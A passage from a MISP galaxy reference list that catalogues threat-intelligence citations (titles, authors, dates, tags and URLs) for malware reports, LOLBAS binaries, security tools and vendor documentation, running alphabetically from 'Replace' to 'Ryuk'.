The tag is: misp-galaxy:references="Microsoft Replace Process Token"

Table 15171. Table References

Links

https://docs.microsoft.com/windows/device-security/security-policy-settings/replace-a-process-level-token

Replace.exe - LOLBAS Project

LOLBAS. (2018, May 25). Replace.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Replace.exe - LOLBAS Project"

Table 15172. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Replace/

Bugcrowd Replay Attack

Bugcrowd. (n.d.). Replay Attack. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Bugcrowd Replay Attack"

Table 15173. Table References

Links

https://www.bugcrowd.com/glossary/replay-attack/

Mac Forwarding Rules

Apple. (n.d.). Reply to, forward, or redirect emails in Mail on Mac. Retrieved June 22, 2021.

The tag is: misp-galaxy:references="Mac Forwarding Rules"

Table 15174. Table References

Links

https://support.apple.com/guide/mail/reply-to-forward-or-redirect-emails-mlhlp1010/mac

GitHub Reptile

Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="GitHub Reptile"

Table 15175. Table References

Links

https://github.com/f0rb1dd3n/Reptile

AWS Temporary Security Credentials

AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="AWS Temporary Security Credentials"

Table 15176. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html

ARS Technica China Hack SK April 2017

Sean Gallagher. (2017, April 21). Researchers claim China trying to hack South Korea missile defense efforts. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="ARS Technica China Hack SK April 2017"

Table 15177. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

Wired SandCat Oct 2019

Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Wired SandCat Oct 2019"

Table 15178. Table References

Links

https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec

MSitPros CMSTP Aug 2017

Moe, O. (2017, August 15). Research on CMSTP.exe. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="MSitPros CMSTP Aug 2017"

Table 15179. Table References

Links

https://msitpros.com/?p=3960

sentinellabs resource named fork 2020

Phil Stokes. (2020, November 5). Resourceful macOS Malware Hides in Named Fork. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="sentinellabs resource named fork 2020"

Table 15180. Table References

Links

https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/

GitHub Responder

Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.

The tag is: misp-galaxy:references="GitHub Responder"

Table 15181. Table References

Links

https://github.com/SpiderLabs/Responder

Mandiant UNC2589 March 2022

Sadowski, J; Hall, R. (2022, March 4). Responses to Russia’s Invasion of Ukraine Likely to Spur Retaliation. Retrieved June 9, 2022.

The tag is: misp-galaxy:references="Mandiant UNC2589 March 2022"

Table 15182. Table References

Links

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

CrowdStrike BGH Ransomware 2021

Falcon Complete Team. (2021, May 11). Response When Minutes Matter: Rising Up Against Ransomware. Retrieved October 8, 2021.

The tag is: misp-galaxy:references="CrowdStrike BGH Ransomware 2021"

Table 15183. Table References

Links

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/

Google - Restore Cloud Snapshot

Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Google - Restore Cloud Snapshot"

Table 15184. Table References

Links

https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

Google Instances Resource

Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.

The tag is: misp-galaxy:references="Google Instances Resource"

Table 15185. Table References

Links

https://cloud.google.com/compute/docs/reference/rest/v1/instances

Secureworks IRON LIBERTY July 2019

Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.

The tag is: misp-galaxy:references="Secureworks IRON LIBERTY July 2019"

Table 15186. Table References

Links

https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector

Palo Alto Retefe

Levene, B., Falcone, R., Grunzweig, J., Lee, B., Olson, R. (2015, August 20). Retefe Banking Trojan Targets Sweden, Switzerland and Japan. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Palo Alto Retefe"

Table 15187. Table References

Links

https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/

AWS Secrets Manager

AWS. (n.d.). Retrieve secrets from AWS Secrets Manager. Retrieved September 25, 2023.

The tag is: misp-galaxy:references="AWS Secrets Manager"

Table 15188. Table References

Links

https://docs.aws.amazon.com/secretsmanager/latest/userguide/retrieving-secrets.html

Directory Services Internals DPAPI Backup Keys Oct 2015

Grafnetter, M. (2015, October 26). Retrieving DPAPI Backup Keys from Active Directory. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Directory Services Internals DPAPI Backup Keys Oct 2015"

Table 15189. Table References

Links

https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/

Malwarebytes RokRAT VBA January 2021

Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.

The tag is: misp-galaxy:references="Malwarebytes RokRAT VBA January 2021"

Table 15190. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/

jRAT Symantec Aug 2018

Sharma, R. (2018, August 15). Revamped jRAT Uses New Anti-Parsing Techniques. Retrieved September 21, 2018.

The tag is: misp-galaxy:references="jRAT Symantec Aug 2018"

Table 15191. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/jrat-new-anti-parsing-techniques

Morphisec Snip3 May 2021

Lorber, N. (2021, May 7). Revealing the Snip3 Crypter, a Highly Evasive RAT Loader. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="Morphisec Snip3 May 2021"

Table 15192. Table References

Links

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

Microsoft DUBNIUM June 2016

Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM June 2016"

Table 15193. Table References

Links

https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/

Microsoft DUBNIUM Flash June 2016

Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM Flash June 2016"

Table 15194. Table References

Links

https://www.microsoft.com/security/blog/2016/06/20/reverse-engineering-dubniums-flash-targeting-exploit/

Microsoft DUBNIUM July 2016

Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Microsoft DUBNIUM July 2016"

Table 15195. Table References

Links

https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/

CSRB LAPSUS$ July 24 2023

Cyber Safety Review Board. (2023, July 24). Review of the Attacks Associated with LAPSUS$ and Related Threat Groups. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="CSRB LAPSUS$ July 24 2023"

Table 15196. Table References

Links

https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf

Intel 471 REvil March 2020

Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Intel 471 REvil March 2020"

Table 15197. Table References

Links

https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/

BleepingComputer REvil 2021

Abrams, L. (2021, March 19). REvil ransomware has a new ‘Windows Safe Mode’ encryption mode. Retrieved June 23, 2021.

The tag is: misp-galaxy:references="BleepingComputer REvil 2021"

Table 15198. Table References

Links

https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/

Secureworks REvil September 2019

Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Secureworks REvil September 2019"

Table 15199. Table References

Links

https://www.secureworks.com/research/revil-sodinokibi-ransomware

Secureworks GandCrab and REvil September 2019

Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Secureworks GandCrab and REvil September 2019"

Table 15200. Table References

Links

https://www.secureworks.com/blog/revil-the-gandcrab-connection

Enigma Reviving DDE Jan 2018

Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.

The tag is: misp-galaxy:references="Enigma Reviving DDE Jan 2018"

Table 15201. Table References

Links

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

GitHub Revoke-Obfuscation

Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="GitHub Revoke-Obfuscation"

Table 15202. Table References

Links

https://github.com/danielbohannon/Revoke-Obfuscation

FireEye Revoke-Obfuscation July 2017

Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.

The tag is: misp-galaxy:references="FireEye Revoke-Obfuscation July 2017"

Table 15203. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf

HC3 Analyst Note Rhysida Ransomware August 2023

Health Sector Cybersecurity Coordination Center (HC3). (2023, August 4). Rhysida Ransomware. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="HC3 Analyst Note Rhysida Ransomware August 2023"

Table 15204. Table References

Links

https://www.hhs.gov/sites/default/files/rhysida-ransomware-sector-alert-tlpclear.pdf

Microsoft XorDdos Linux Stealth 2022

Microsoft Threat Intelligence. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="Microsoft XorDdos Linux Stealth 2022"

Table 15205. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

httrack_unhcr

RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="httrack_unhcr"

Table 15206. Table References

Links

https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/

US-CERT Alert TA13-175A Risks of Default Passwords on the Internet

US-CERT. (n.d.). Risks of Default Passwords on the Internet. Retrieved April 12, 2019.

The tag is: misp-galaxy:references="US-CERT Alert TA13-175A Risks of Default Passwords on the Internet"

Table 15207. Table References

Links

https://www.us-cert.gov/ncas/alerts/TA13-175A

ROADtools Github

Dirk-jan Mollema. (2022, January 31). ROADtools. Retrieved January 31, 2022.

The tag is: misp-galaxy:references="ROADtools Github"

Table 15208. Table References

Links

https://github.com/dirkjanm/ROADtools

Harmj0y Roasting AS-REPs Jan 2017

HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Harmj0y Roasting AS-REPs Jan 2017"

Table 15209. Table References

Links

http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/

Anomali Rocke March 2019

Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="Anomali Rocke March 2019"

Table 15210. Table References

Links

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

Talos Rocke August 2018

Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Talos Rocke August 2018"

Table 15211. Table References

Links

https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html

Check Point Rocket Kitten

Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018.

The tag is: misp-galaxy:references="Check Point Rocket Kitten"

Table 15212. Table References

Links

https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

NCCGroup RokRat Nov 2018

Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.

The tag is: misp-galaxy:references="NCCGroup RokRat Nov 2018"

Table 15213. Table References

Links

https://research.nccgroup.com/2018/11/08/rokrat-analysis/

Talos ROKRAT 2

Mercer, W., Rascagneres, P. (2017, November 28). ROKRAT Reloaded. Retrieved May 21, 2018.

The tag is: misp-galaxy:references="Talos ROKRAT 2"

Table 15214. Table References

Links

https://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

Kubernetes RBAC

Kubernetes. (n.d.). Role Based Access Control Good Practices. Retrieved March 8, 2023.

The tag is: misp-galaxy:references="Kubernetes RBAC"

Table 15215. Table References

Links

https://kubernetes.io/docs/concepts/security/rbac-good-practices/

Google Cloud Service Account Authentication Roles

Google Cloud. (n.d.). Roles for service account authentication. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="Google Cloud Service Account Authentication Roles"

Table 15216. Table References

Links

https://cloud.google.com/iam/docs/service-account-permissions

BBC-Ronin

Joe Tidy. (2022, March 30). Ronin Network: What a $600m hack says about the state of crypto. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="BBC-Ronin"

Table 15217. Table References

Links

https://www.bbc.com/news/technology-60933174

Wikipedia Root Certificate

Wikipedia. (2016, December 6). Root certificate. Retrieved February 20, 2017.

The tag is: misp-galaxy:references="Wikipedia Root Certificate"

Table 15218. Table References

Links

https://en.wikipedia.org/wiki/Root_certificate

Wikipedia Rootkit

Wikipedia. (2016, June 1). Rootkit. Retrieved June 2, 2016.

The tag is: misp-galaxy:references="Wikipedia Rootkit"

Table 15219. Table References

Links

https://en.wikipedia.org/wiki/Rootkit

Sekoia HideDRV Oct 2016

Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017.

The tag is: misp-galaxy:references="Sekoia HideDRV Oct 2016"

Table 15220. Table References

Links

http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

RotaJakiro 2021 netlab360 analysis

Alex Turing, Hui Wang. (2021, April 28). RotaJakiro: A long live secret backdoor with 0 VT detection. Retrieved June 14, 2023.

The tag is: misp-galaxy:references="RotaJakiro 2021 netlab360 analysis"

Table 15221. Table References

Links

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

netlab360 rotajakiro vs oceanlotus

Alex Turing. (2021, May 6). RotaJakiro, the Linux version of the OceanLotus. Retrieved June 14, 2023.

The tag is: misp-galaxy:references="netlab360 rotajakiro vs oceanlotus"

Table 15222. Table References

Links

https://blog.netlab.360.com/rotajakiro_linux_version_of_oceanlotus/

TechNet Route

Microsoft. (n.d.). Route. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Route"

Table 15223. Table References

Links

https://technet.microsoft.com/en-us/library/bb490991.aspx

Kroll Royal Deep Dive February 2023

Iacono, L. and Green, S. (2023, February 13). Royal Ransomware Deep Dive. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Kroll Royal Deep Dive February 2023"

Table 15224. Table References

Links

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

Trend Micro Royal Linux ESXi February 2023

Morales, N. et al. (2023, February 20). Royal Ransomware Expands Attacks by Targeting Linux ESXi Servers. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Trend Micro Royal Linux ESXi February 2023"

Table 15225. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

Cybereason Royal December 2022

Cybereason Global SOC and Cybereason Security Research Teams. (2022, December 14). Royal Rumble: Analysis of Royal Ransomware. Retrieved March 30, 2023.

The tag is: misp-galaxy:references="Cybereason Royal December 2022"

Table 15226. Table References

Links

https://www.cybereason.com/blog/royal-ransomware-analysis

Rpcping.exe - LOLBAS Project

LOLBAS. (2018, May 25). Rpcping.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rpcping.exe - LOLBAS Project"

Table 15227. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rpcping/

Threatpost New Op Sharpshooter Data March 2019

  1. O’Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.

The tag is: misp-galaxy:references="Threatpost New Op Sharpshooter Data March 2019"

Table 15228. Table References

Links

https://threatpost.com/sharpshooter-complexity-scope/142359/

GCN RSA June 2011

Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.

The tag is: misp-galaxy:references="GCN RSA June 2011"

Table 15229. Table References

Links

https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/

RSA Shell Crew

RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="RSA Shell Crew"

Table 15230. Table References

Links

https://www.rsa.com/content/dam/en/white-paper/rsa-incident-response-emerging-threat-profile-shell-crew.pdf

GitHub Rubeus March 2023

Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.

The tag is: misp-galaxy:references="GitHub Rubeus March 2023"

Table 15231. Table References

Links

https://github.com/GhostPack/Rubeus

SOCPrime DoubleExtension

Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.

The tag is: misp-galaxy:references="SOCPrime DoubleExtension"

Table 15232. Table References

Links

https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/

SensePost Ruler GitHub

SensePost. (2016, August 18). Ruler: A tool to abuse Exchange services. Retrieved February 4, 2019.

The tag is: misp-galaxy:references="SensePost Ruler GitHub"

Table 15233. Table References

Links

https://github.com/sensepost/ruler

Microsoft Cloud App Security

Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.

The tag is: misp-galaxy:references="Microsoft Cloud App Security"

Table 15234. Table References

Links

https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154

Microsoft Run Key

Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Microsoft Run Key"

Table 15235. Table References

Links

http://msdn.microsoft.com/en-us/library/aa376977

Microsoft RunAs

Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.

The tag is: misp-galaxy:references="Microsoft RunAs"

Table 15236. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

Microsoft runas

Microsoft TechNet. (n.d.). Runas. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Microsoft runas"

Table 15237. Table References

Links

https://technet.microsoft.com/en-us/library/bb490994.aspx

Wikipedia Run Command

Wikipedia. (2018, August 3). Run Command. Retrieved October 12, 2018.

The tag is: misp-galaxy:references="Wikipedia Run Command"

Table 15238. Table References

Links

https://en.wikipedia.org/wiki/Run_command

Secpod Winexe June 2017

Prakash, T. (2017, June 21). Run commands on Windows system remotely using Winexe. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Secpod Winexe June 2017"

Table 15239. Table References

Links

http://www.secpod.com/blog/winexe/

Rundll32.exe - LOLBAS Project

LOLBAS. (2018, May 25). Rundll32.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Rundll32.exe - LOLBAS Project"

Table 15240. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rundll32/

Attackify Rundll32.exe Obscurity

Attackify. (n.d.). Rundll32.exe Obscurity. Retrieved August 23, 2021.

The tag is: misp-galaxy:references="Attackify Rundll32.exe Obscurity"

Table 15241. Table References

Links

https://www.attackify.com/blog/rundll32_execution_order/

Runexehelper.exe - LOLBAS Project

LOLBAS. (2022, December 13). Runexehelper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runexehelper.exe - LOLBAS Project"

Table 15242. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/

ELC Running at startup

hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="ELC Running at startup"

Table 15243. Table References

Links

https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/

Powershell Remote Commands

Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Powershell Remote Commands"

Table 15244. Table References

Links

https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1

Runonce.exe - LOLBAS Project

LOLBAS. (2018, May 25). Runonce.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runonce.exe - LOLBAS Project"

Table 15245. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

Apple Developer Doco Archive Run-Path

Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Apple Developer Doco Archive Run-Path"

Table 15246. Table References

Links

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html

Runscripthelper.exe - LOLBAS Project

LOLBAS. (2018, May 25). Runscripthelper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Runscripthelper.exe - LOLBAS Project"

Table 15247. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/

Microsoft Run Command

Microsoft. (2023, March 10). Run scripts in your VM by using Run Command. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="Microsoft Run Command"

Table 15248. Table References

Links

https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview

McAfee APT28 DDE2 Nov 2017

Paganini, P. (2017, November 9). Russia-Linked APT28 group observed using DDE attack to deliver malware. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="McAfee APT28 DDE2 Nov 2017"

Table 15249. Table References

Links

http://securityaffairs.co/wordpress/65318/hacking/dde-attack-apt28.html

Security Affairs DustSquad Oct 2018

Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.

The tag is: misp-galaxy:references="Security Affairs DustSquad Oct 2018"

Table 15250. Table References

Links

https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html

SecurityWeek Nomadic Octopus Oct 2018

Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="SecurityWeek Nomadic Octopus Oct 2018"

Table 15251. Table References

Links

https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia

U.S. Federal Bureau of Investigation 2 27 2024

U.S. Federal Bureau of Investigation. (2024, February 27). Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. Retrieved February 28, 2024.

The tag is: misp-galaxy:references="U.S. Federal Bureau of Investigation 2 27 2024"

Table 15252. Table References

Links

https://www.ic3.gov/Media/News/2024/240227.pdf

U.S. CISA SVR TeamCity Exploits December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 13). Russian Foreign Intelligence Service (SVR) Exploiting JetBrains TeamCity CVE Globally. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="U.S. CISA SVR TeamCity Exploits December 2023"

Table 15253. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

U.S. CISA Star Blizzard December 2023

Cybersecurity and Infrastructure Security Agency. (2023, December 7). Russian FSB Cyber Actor Star Blizzard Continues Worldwide Spear-phishing Campaigns. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="U.S. CISA Star Blizzard December 2023"

Table 15254. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-341a

NSA/FBI Drovorub August 2020

NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.

The tag is: misp-galaxy:references="NSA/FBI Drovorub August 2020"

Table 15255. Table References

Links

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

Cybersecurity Advisory GRU Brute Force Campaign July 2021

NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.

The tag is: misp-galaxy:references="Cybersecurity Advisory GRU Brute Force Campaign July 2021"

Table 15256. Table References

Links

https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF

BleepingComputer Ebury March 2017

Cimpanu, C.. (2017, March 29). Russian Hacker Pleads Guilty for Role in Infamous Linux Ebury Malware. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="BleepingComputer Ebury March 2017"

Table 15257. Table References

Links

https://www.bleepingcomputer.com/news/security/russian-hacker-pleads-guilty-for-role-in-infamous-linux-ebury-malware/

Russian 2FA Push Annoyance - Cimpanu

Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="Russian 2FA Push Annoyance - Cimpanu"

Table 15258. Table References

Links

https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/

Unit42 Redaman January 2019

Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="Unit42 Redaman January 2019"

Table 15259. Table References

Links

https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/

CISA MFA PrintNightmare

Cybersecurity and Infrastructure Security Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="CISA MFA PrintNightmare"

Table 15260. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

Russians Exploit Default MFA Protocol - CISA March 2022

Cyber Security Infrastructure Agency. (2022, March 15). Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and “PrintNightmare” Vulnerability. Retrieved May 31, 2022.

The tag is: misp-galaxy:references="Russians Exploit Default MFA Protocol - CISA March 2022"

Table 15261. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-074a

alert_TA18_106A

CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.

The tag is: misp-galaxy:references="alert_TA18_106A"

Table 15262. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/TA18-106A

US-CERT TA18-106A Network Infrastructure Devices 2018

US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="US-CERT TA18-106A Network Infrastructure Devices 2018"

Table 15263. Table References

Links

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

UK GOV FSB Factsheet April 2022

UK Gov. (2022, April 5). Russia’s FSB malign activity: factsheet. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="UK GOV FSB Factsheet April 2022"

Table 15264. Table References

Links

https://www.gov.uk/government/publications/russias-fsb-malign-cyber-activity-factsheet/russias-fsb-malign-activity-factsheet

Unit 42 Gamaredon February 2022

Unit 42. (2022, February 3). Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine. Retrieved February 21, 2022.

The tag is: misp-galaxy:references="Unit 42 Gamaredon February 2022"

Table 15265. Table References

Links

https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/

Wired Russia Cyberwar

Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="Wired Russia Cyberwar"

Table 15266. Table References

Links

https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/

RyanW3stman Tweet October 10 2023

RyanW3stman. (2023, October 10). RyanW3stman Tweet October 10 2023. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="RyanW3stman Tweet October 10 2023"

Table 15267. Table References

Links

https://twitter.com/RyanW3stman/status/1711732225996165135

DFIR Ryuk in 5 Hours October 2020

The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="DFIR Ryuk in 5 Hours October 2020"

Table 15268. Table References

Links

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

ANSSI RYUK RANSOMWARE

ANSSI. (2021, February 25). RYUK RANSOMWARE. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="ANSSI RYUK RANSOMWARE"

Table 15269. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

Bleeping Computer - Ryuk WoL

Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.

